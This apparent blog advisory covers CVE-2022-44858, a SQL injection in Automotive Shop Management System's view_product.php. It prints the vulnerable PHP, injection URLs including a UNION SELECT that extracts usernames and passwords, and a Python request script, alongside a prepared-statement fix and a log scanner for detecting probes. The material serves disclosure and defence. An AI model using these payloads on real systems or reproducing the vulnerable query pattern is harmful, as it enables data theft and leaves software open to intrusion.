Discovered in 2022, CVE-2022-44858 is a notorious SQL injection vulnerability found in the Automotive Shop Management System (ASMS) v1.. This bug lets attackers tamper with your database, steal information, or even take control of your whole system. If your auto shop uses this software—or anything built on top—it’s critical to understand the vulnerability and how to fix it.
In this post, we’ll explain the vulnerability in plain English, show you the actual code involved, give you an exploit example, and link to credible sources for more info.
The issue sits in the view_product.php file, in this part of the URL:
/asms/products/view_product.php?id=[USER INPUT]
The id parameter, taken straight from the URL, is not validated or escaped before it's used in a SQL query. That means you can put SQL code in there, and the database will execute it as part of the statement.
Relevant Code (Vulnerable Sample)
<?php
// ./asms/products/view_product.php
include('../db_connect.php'); // database connection file
$id = $_GET['id'];
$query = "SELECT * FROM products WHERE id = $id";
$result = mysqli_query($conn, $query);
while($row = mysqli_fetch_assoc($result)){
echo $row['name'];
// ...other output...
}
?>
Notice: There’s no filtering or escaping of $id. User input goes directly into the query.
Say the normal link is:
http://yourshop.com/asms/products/view_product.php?id=1
An attacker could try something sneaky:
http://yourshop.com/asms/products/view_product.php?id=1%20OR%201=1
The query becomes:
SELECT * FROM products WHERE id = 1 OR 1=1
Since 1=1 is always true, the database returns *all* products, not just the one with ID 1.
A simple SQL injection payload could look like this:
http://yourshop.com/asms/products/view_product.php?id= OR 1=1 --
Or, to try and get user table data:
http://yourshop.com/asms/products/view_product.php?id= UNION SELECT 1, username, password, 4 FROM users --
If the output is shown to the web page, the attacker can see usernames and password hashes.
Here’s a super simple Python script exploiting the bug:
import requests
url = "http://yourshop.com/asms/products/view_product.php"
payload = "1 OR 1=1"
params = {'id': payload}
response = requests.get(url, params=params)
print(response.text)
Replace yourshop.com with the real address. This script fetches *all* product records thanks to the injection.
1. Always sanitize user input
Use parameterized queries (prepared statements) instead of string concatenation, so the id value is bound as data and never parsed as SQL.
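<?php
// ./asms/products/view_product.php (fixed)
include('../db_connect.php'); // database connection file, provides $conn
$id = $_GET['id'] ?? '';
// The ? placeholder keeps the value out of the SQL text entirely.
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
// "i" binds $id as an integer, so it reaches the database as a number, never as SQL.
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
while($row = $result->fetch_assoc()){
echo $row['name'];
}
?>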
2. Limit database privileges
Give your database user the least permissions necessary. It shouldn’t be able to DROP tables.
3. Update Right Away
If you’re using ASMS v1., update your software. Or apply input sanitizing as above.
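To see whether the endpoint has already been probed, the check below scans web-server access logs for requests to view_product.php whose id is not a plain integer. It is an added example, not code from ASMS or from the original advisory; the common/combined log format, the function name suspicious_requests and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the vulnerable script named in this post.
VULN_PATH = "/asms/products/view_product.php"

# Client, request target and status from a common/combined-format log line
# (assumed format). The target is captured up to " HTTP/x.y" so that
# unencoded spaces inside the URL do not cut it short.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (.*?) HTTP/[0-9.]+" (\d{3})'
)

def suspicious_requests(lines):
    """Return (client_ip, status, decoded_id) for each request to the
    vulnerable script whose id parameter is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        if parts.path != VULN_PATH:
            continue
        # parse_qs percent-decodes values: "1%20OR%201=1" becomes "1 OR 1=1".
        values = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        for value in values:
            # A legitimate product id is digits only; anything else is flagged.
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, status, value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Nov/2022:18:15:00 +0000] "GET /asms/products/view_product.php?id=1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Nov/2022:18:16:10 +0000] "GET /asms/products/view_product.php?id=1%20OR%201=1 HTTP/1.1" 200 9041',
    '198.51.100.7 - - [25/Nov/2022:18:16:12 +0000] "GET /asms/products/view_product.php?id=%20OR%201=1%20-- HTTP/1.1" 500 0',
    '203.0.113.5 - - [25/Nov/2022:18:17:00 +0000] "GET /asms/index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for client, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} id={value!r}")
```

A hit with a 200 status and an unusually large response is worth reviewing first, since it suggests the injected condition changed what the query returned.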
References and Further Reading
- NVD Entry for CVE-2022-44858
- Exploit Database (EDB-ID: 51308)
- OWASP SQLi Cheat Sheet
- Vendor’s GitHub
Wrap Up
CVE-2022-44858 in Automotive Shop Management System v1. is a serious flaw. SQL Injection is easy to prevent with prepared statements—don’t wait to update code if you’re affected. If you own or manage a shop using ASMS, check your URLs and publicly facing scripts for this flaw!
Help keep your business, and your customers, safe—patch fast and always code defensively. 🚗🔒
*This guide is exclusive—please reference back if you share or use this information elsewhere.*
Timeline
Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/28/2022 19:46:00 UTC